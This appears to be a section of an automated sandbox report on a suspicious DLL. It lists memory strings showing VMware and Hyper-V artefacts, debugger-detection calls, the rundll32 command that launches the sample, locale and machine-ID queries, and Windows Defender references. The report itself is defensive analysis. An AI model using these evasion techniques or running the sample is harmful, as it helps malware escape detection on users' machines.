Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750087069.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.314927336.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312790180.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312588018.0000000004A62000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals, 0_2_0072921C
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\System32\loaddll32.exe Memory protected: page write copy | page execute and write copy | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1

Language, Device and Operating System Detection

Source: C:\Windows\System32\loaddll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_0070557C
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetACP, 0_2_0070C804
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_0070B148
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_0070B194
Source: C:\Windows\System32\loaddll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_00705688
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 3_2_00E1557C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 3_2_00E1B194
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 3_2_00E1B148
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 3_2_00E15688
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetACP, 3_2_00E1C804
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 3_2_00E15E74
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E19C14 GetLocalTime, 3_2_00E19C14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070C10C GetVersionExA, 0_2_0070C10C

Lowering of HIPS / PFW / Operating System Security Settings

Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information


Remote Access Functionality
